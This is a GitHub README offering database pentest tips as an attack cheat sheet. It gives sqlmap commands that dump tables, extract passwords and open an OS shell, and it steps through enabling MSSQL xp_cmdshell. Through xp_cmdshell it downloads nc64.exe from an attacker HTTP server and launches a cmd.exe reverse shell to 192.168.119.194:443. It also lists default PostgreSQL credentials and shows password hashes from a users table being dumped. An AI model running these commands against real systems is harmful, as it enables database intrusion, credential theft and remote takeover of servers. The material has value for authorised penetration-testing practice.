Skip to content

Kiosec/Database-Exploitation

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
README.md
README.md
 
 

Repository files navigation

Database-Exploitation

Table of contents

⭕ SQLMAP

➤ Specify a DBMS
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbms Oracle


➤ Enumerate the database names
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs


➤ Enumerate the tables
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} --tables


➤ Enumerate the columns
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} -T {TABLE} --columns


➤ Dump columns
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} -T {TABLE} -C {COLUMN01, COLUMNS02...} --dump


➤ Get the operating system command shell
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --os-shell
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --os-cmd=whoami


➤ Try to detect and dump the passwords
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --passwords

⭕ Access to a database

🔻SQSH - Connect to a database

sqsh -U <user> -P <password> -S <ip:port> -D <database>
ex: sqsh -U sa -P badpassword -S 10.0.0.1:1433 -D bankdb

⭕ Operate with database management system

🔻MSSQL

Activate xp_cmdshell

Error: "SQL Server blocked access to proecedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can be enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online."

1> EXEC SP_CONFIGURE 'show advanced options',1
2> reconfigure
3> go

1> EXEC SP_CONFIGURE 'xp_cmdshell',1
2> reconfigure
3> go

Execute commands through xp_cmdshell

1> xp_cmdshell 'whoami'
2> go

Reverse shell through xp_cmdshell

➤ Create a netcat listener
nc -lvp 443

➤ Create a reverse shell (here nc64.exe) and the http server 
python3 -m http.server

➤ On the database, upload the file from the http server
1> exec xp_cmdshell "powershell.exe wget http://192.168.119.194:8000/nc64.exe -OutFile c:\Users\Public\nc64.exe"
2> go

➤ Execute the script
1> xp_cmdshell 'c:\Users\Public\nc64.exe -e cmd.exe 192.168.119.194 443'
2> go

🔻POSTGRESQL

Default user/password

User Password
postgres postgres

Connect to a local PostgreSQL instance

kiosec@cyberlab:/home$ psql -h 127.0.0.1 -U postgres
psql -h 127.0.0.1 -U postgres
Password for user postgres: ******

psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

postgres=#

Connect to a remote PostgreSQL instance

kiosec@cyberlab:/home$ psql -h 10.0.0.1 -p 5437 -U postgres
psql -h 127.0.0.1 -U postgres
Password for user postgres: ******

psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

postgres=#

List all the available databases

postgres=# \list
\list
WARNING: terminal is not fully functional
Press RETURN to continue 

                                   List of databases
    Name     |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges   
-------------+----------+----------+-------------+-------------+---------------------
 testDB      | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | 
 postgres    | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
(END)q

Connect to the database by utilizing the \connect directive

Important note : Be careful to come back to the main prompt (psotegre=#) by utilizind the "q" command

postgres=# \connect testDB
\connect testDB
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
You are now connected to database "testDB" as user "postgres".
testDB=#

List all database tables

testDB=# \dt
\dt
WARNING: terminal is not fully functional
Press RETURN to continue 

         List of relations
 Schema | Name  | Type  |  Owner   
--------+-------+-------+----------
 public | hosts | table | postgres
 public | users | table | postgres
(2 rows)

(END)q
testDB=#

View the content of a table

TestDB=# select * from users;
select * from users;
WARNING: terminal is not fully functional
Press RETURN to continue 

   name  |                           password                           | role
---------+--------------------------------------------------------------+------
TestUser | $2a$10$E/Vcd9ecflmPud************************NVNV3Mm6eH58zim | User
Admin    | $2a$10$SpKYdHLB0FOaT7************************b2MZib3H9kVO8dm | Admin
(2 rows)
(END)q

Deconnection of PostgreSQL

postgre-# \q
\q
could not save history to file "/home/app/.psql_history": No such file or directory
kiosec@cyberlab:/home$

🔻MYSQL

Connect to a local mysql instance

mysql -u username -h 127.0.0.1 -p
Enter password:
Welcome to the Mysql monitor. Commands end with ; or \g.
<...>

List all database tables

mysql> show databases;

List tables from a database:

USE <database_name>;
SHOW TABLES;

About

Pentest tips on databases

Topics

sqlmap

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published